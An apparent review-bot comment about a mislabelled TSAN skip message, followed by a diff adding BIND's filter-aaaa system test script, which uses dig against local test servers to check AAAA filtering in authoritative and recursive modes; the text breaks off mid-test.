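Review bot: The TSAN branch of prereq.sh prints `TSAN - skipping dlzexternal test`, which names a different test directory and looks copied from there, so a skipped filter-aaaa run would be logged under the wrong name. It should read `echo_i "TSAN - skipping filter-aaaa test"`, matching the dlopen message earlier in the same file. A one-line comment on why the test is skipped under TSAN would also help, since the hunk does not say.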
diff --git a/bin/tests/system/filter-aaaa/tests.sh b/bin/tests/system/filter-aaaa/tests.sh
new file mode 100644
index 0000000..a173f6a
--- /dev/null
+++ b/bin/tests/system/filter-aaaa/tests.sh
@@ -0,0 +1,1419 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +rm -f dig.out.* + +DIGOPTS="+tcp +noadd +nosea +nostat +nocmd -p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +for conf in conf/good*.conf +do + n=`expr $n + 1` + echo_i "checking that $conf is accepted ($n)" + ret=0 + $CHECKCONF "$conf" || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +for conf in conf/bad*.conf +do + n=`expr $n + 1` + echo_i "checking that $conf is rejected ($n)" + ret=0 + $CHECKCONF "$conf" >/dev/null && ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +# +# Authoritative tests against: +# filter-aaaa-on-v4 yes; +# filter-aaaa { 10.53.0.1; }; +# +n=`expr $n + 1` +echo_i "checking that AAAA is returned when only AAAA record exists, signed ($n)" +ret=0 +$DIG $DIGOPTS aaaa aaaa-only.signed -b 10.53.0.1 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "AUTHORITY: 1," dig.out.ns1.test$n > /dev/null || ret=1 +grep ::2 dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when only AAAA record exists, unsigned ($n)" +ret=0 +$DIG $DIGOPTS aaaa aaaa-only.unsigned -b 10.53.0.1 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "AUTHORITY: 1," dig.out.ns1.test$n > /dev/null || ret=1 +grep ::5 dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr 
$n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, signed ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.signed -b 10.53.0.1 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns1.test$n > /dev/null || ret=1 +grep "AUTHORITY: 0" dig.out.ns1.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b 10.53.0.1 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns1.test$n > /dev/null || ret=1 +grep "AUTHORITY: 0" dig.out.ns1.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when both AAAA and A records exist, signed and DO set ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.signed +dnssec -b 10.53.0.1 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "AUTHORITY: 2," dig.out.ns1.test$n > /dev/null || ret=1 +grep ::3 dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned and DO set ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b 10.53.0.1 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns1.test$n > /dev/null || ret=1 +grep "AUTHORITY: 0," dig.out.ns1.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when both AAAA and A records exist and query source does not match acl ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b 
10.53.0.2 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "AUTHORITY: 1," dig.out.ns1.test$n > /dev/null || ret=1 +grep ::6 dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, signed and qtype=ANY ($n)" +ret=0 +$DIG $DIGOPTS any dual.signed -b 10.53.0.1 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "1.0.0.3" dig.out.ns1.test$n > /dev/null || ret=1 +grep "::3" dig.out.ns1.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned and qtype=ANY ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned -b 10.53.0.1 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "1.0.0.6" dig.out.ns1.test$n > /dev/null || ret=1 +grep "::6" dig.out.ns1.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that both A and AAAA are returned when both AAAA and A records exist, signed, qtype=ANY and DO is set ($n)" +ret=0 +$DIG $DIGOPTS any dual.signed +dnssec -b 10.53.0.1 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "AUTHORITY: 2," dig.out.ns1.test$n > /dev/null || ret=1 +grep ::3 dig.out.ns1.test$n > /dev/null || ret=1 +grep "1.0.0.3" dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned, qtype=ANY and DO is set ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned +dnssec -b 
10.53.0.1 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "1.0.0.6" dig.out.ns1.test$n > /dev/null || ret=1 +grep "::6" dig.out.ns1.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that both A and AAAA are returned when both AAAA and A records exist, qtype=ANY and query source does not match acl ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned -b 10.53.0.2 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "AUTHORITY: 1," dig.out.ns1.test$n > /dev/null || ret=1 +grep 1.0.0.6 dig.out.ns1.test$n > /dev/null || ret=1 +grep ::6 dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when both AAAA and A record exists, unsigned over IPv6 ($n)" +if testsock6 fd92:7065:b8e:ffff::1 +then +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1 +grep 2001:db8::6 dig.out.ns1.test$n > /dev/null || ret=1 +grep "AUTHORITY: 1," dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +else +echo_i "skipped." 
+fi + +n=`expr $n + 1` +echo_i "checking that AAAA is omitted from additional section, qtype=NS ($n)" +ret=0 +$DIG $DIGOPTS +add ns unsigned -b 10.53.0.1 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep AAAA dig.out.ns1.test$n > /dev/null 2>&1 && ret=1 +grep "ANSWER: 1," dig.out.ns1.test$n > /dev/null || ret=1 +grep "ADDITIONAL: 2" dig.out.ns1.test$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is omitted from additional section, qtype=MX, unsigned ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec mx unsigned -b 10.53.0.1 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "^mx.unsigned.*AAAA" dig.out.ns1.test$n > /dev/null 2>&1 && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is included in additional section, qtype=MX, signed ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec mx signed -b 10.53.0.1 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "^mx.signed.*AAAA" dig.out.ns1.test$n > /dev/null 2>&1 || ret=1 +grep "AUTHORITY: 2," dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is included in additional section, qtype=MX, unsigned, over IPv6 ($n)" +if testsock6 fd92:7065:b8e:ffff::1 +then +ret=0 +$DIG $DIGOPTS +add +dnssec mx unsigned -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1 +grep "^mx.unsigned.*AAAA" dig.out.ns1.test$n > /dev/null 2>&1 || ret=1 +grep "AUTHORITY: 1," dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +else +echo_i "skipped." 
+fi + +# +# Authoritative tests against: +# filter-aaaa-on-v4 break-dnssec; +# filter-aaaa { 10.53.0.4; }; +# +n=`expr $n + 1` +echo_i "checking that AAAA is returned when only AAAA record exists, signed with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa aaaa-only.signed -b 10.53.0.4 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "AUTHORITY: 1," dig.out.ns4.test$n > /dev/null || ret=1 +grep ::2 dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when only AAAA record exists, unsigned with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa aaaa-only.unsigned -b 10.53.0.4 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "AUTHORITY: 1," dig.out.ns4.test$n > /dev/null || ret=1 +grep ::5 dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, signed with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.signed -b 10.53.0.4 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns4.test$n > /dev/null || ret=1 +grep "AUTHORITY: 0," dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b 10.53.0.4 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, signed and DO set with break-dnssec ($n)" +ret=0 +$DIG 
$DIGOPTS aaaa dual.signed +dnssec -b 10.53.0.4 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned and DO set with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b 10.53.0.4 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when both AAAA and A records exist and query source does not match acl with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b 10.53.0.2 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep ::6 dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, signed and qtype=ANY with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS any dual.signed -b 10.53.0.4 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "1.0.0.3" dig.out.ns4.test$n > /dev/null || ret=1 +grep "::3" dig.out.ns4.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned and qtype=ANY with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned -b 10.53.0.4 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "1.0.0.6" dig.out.ns4.test$n > 
/dev/null || ret=1 +grep "::6" dig.out.ns4.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, signed, qtype=ANY and DO is set with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS any dual.signed +dnssec -b 10.53.0.4 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "1.0.0.3" dig.out.ns4.test$n > /dev/null || ret=1 +grep ::3 dig.out.ns4.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned, qtype=ANY and DO is set with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned +dnssec -b 10.53.0.4 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "1.0.0.6" dig.out.ns4.test$n > /dev/null || ret=1 +grep "::6" dig.out.ns4.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that both A and AAAA are returned when both AAAA and A records exist, qtype=ANY and query source does not match acl with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned -b 10.53.0.2 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep 1.0.0.6 dig.out.ns4.test$n > /dev/null || ret=1 +grep ::6 dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when both AAAA and A record exists, unsigned over IPv6 with break-dnssec ($n)" +if testsock6 fd92:7065:b8e:ffff::4 +then +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b fd92:7065:b8e:ffff::4 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1 +grep 2001:db8::6 
dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +else +echo_i "skipped." +fi + +n=`expr $n + 1` +echo_i "checking that AAAA is omitted from additional section, qtype=NS, with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS +add ns unsigned -b 10.53.0.4 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep AAAA dig.out.ns4.test$n > /dev/null 2>&1 && ret=1 +grep "ADDITIONAL: 2" dig.out.ns4.test$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is omitted from additional section, qtype=MX, unsigned, with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec mx unsigned -b 10.53.0.4 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "^mx.unsigned.*AAAA" dig.out.ns4.test$n > /dev/null 2>&1 && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is omitted from additional section, qtype=MX, signed, with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec mx signed -b 10.53.0.4 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "^mx.signed.*AAAA" dig.out.ns4.test$n > /dev/null 2>&1 && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is included in additional section, qtype=MX, unsigned, over IPv6, with break-dnssec ($n)" +if testsock6 fd92:7065:b8e:ffff::4 +then +ret=0 +$DIG $DIGOPTS +add +dnssec mx unsigned -b fd92:7065:b8e:ffff::4 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1 +grep "^mx.unsigned.*AAAA" dig.out.ns4.test$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +else +echo_i "skipped." 
+fi + + +# +# Recursive tests against: +# filter-aaaa-on-v4 yes; +# filter-aaaa { 10.53.0.2; }; +# +n=`expr $n + 1` +echo_i "checking that AAAA is returned when only AAAA record exists, signed, recursive ($n)" +ret=0 +$DIG $DIGOPTS aaaa aaaa-only.signed -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null || ret=1 +grep ::2 dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when only AAAA record exists, unsigned, recursive ($n)" +ret=0 +$DIG $DIGOPTS aaaa aaaa-only.unsigned -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep ::5 dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, signed, recursive ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.signed -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null && ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned, recursive ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null && ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when both AAAA and A records exist, signed and DO set, recursive ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.signed +dnssec -b 10.53.0.2 
@10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null || ret=1 +grep ::3 dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned and DO set, recursive ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned +dnssec -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null && ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when both AAAA and A records exist and query source does not match acl, recursive ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b 10.53.0.1 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep ::6 dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, signed and qtype=ANY recursive ($n)" +ret=0 +$DIG $DIGOPTS any dual.signed -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "1.0.0.3" dig.out.ns2.test$n > /dev/null || ret=1 +grep "::3" dig.out.ns2.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned and qtype=ANY recursive ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "1.0.0.6" dig.out.ns2.test$n > /dev/null || 
ret=1 +grep "::6" dig.out.ns2.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that both A and AAAA are returned when both AAAA and A records exist, signed, qtype=ANY and DO is set, recursive ($n)" +ret=0 +$DIG $DIGOPTS any dual.signed +dnssec -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null || ret=1 +grep ::3 dig.out.ns2.test$n > /dev/null || ret=1 +grep "1.0.0.3" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned, qtype=ANY and DO is set, recursive ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned +dnssec -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "1.0.0.6" dig.out.ns2.test$n > /dev/null || ret=1 +grep "::6" dig.out.ns2.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that both A and AAAA are returned when both AAAA and A records exist, qtype=ANY and query source does not match acl, recursive ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned -b 10.53.0.1 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep 1.0.0.6 dig.out.ns2.test$n > /dev/null || ret=1 +grep ::6 dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when both AAAA and A record exists, unsigned over IPv6, recursive ($n)" +if testsock6 fd92:7065:b8e:ffff::2 +then +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1 
+grep 2001:db8::6 dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +else +echo_i "skipped." +fi + +n=`expr $n + 1` +echo_i "checking that AAAA is omitted from additional section, qtype=NS ($n)" +ret=0 +$DIG $DIGOPTS +add ns unsigned -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep AAAA dig.out.ns2.test$n > /dev/null 2>&1 && ret=1 +grep "ADDITIONAL: 2" dig.out.ns2.test$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is omitted from additional section, qtype=MX, unsigned, recursive ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec mx unsigned -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep "^mx.unsigned.*AAAA" dig.out.ns2.test$n > /dev/null 2>&1 && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is included in additional section, qtype=MX, signed, recursive ($n)" +ret=0 +# we need to prime the cache with addresses for the MX, since additional +# section data won't be included unless it's validated, and that doesn't +# necessarily happen otherwise. 
+$DIG $DIGOPTS +dnssec mx.signed @10.53.0.2 > /dev/null +$DIG $DIGOPTS +dnssec mx.signed aaaa @10.53.0.2 > /dev/null +$DIG $DIGOPTS +add +dnssec mx signed -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep "^mx.signed.*AAAA" dig.out.ns2.test$n > /dev/null 2>&1 || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is included in additional section, qtype=MX, unsigned, recursive, over IPv6 ($n)" +if testsock6 fd92:7065:b8e:ffff::2 +then +ret=0 +$DIG $DIGOPTS +add +dnssec mx unsigned -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1 +grep "^mx.unsigned.*AAAA" dig.out.ns2.test$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +else +echo_i "skipped." +fi + +# +# Recursive tests against: +# filter-aaaa-on-v4 break-dnssec; +# filter-aaaa { 10.53.0.3; }; +# +n=`expr $n + 1` +echo_i "checking that AAAA is returned when only AAAA record exists, signed, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa aaaa-only.signed -b 10.53.0.3 @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns3.test$n > /dev/null || ret=1 +grep ::2 dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when only AAAA record exists, unsigned, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa aaaa-only.unsigned -b 10.53.0.3 @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep ::5 dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that 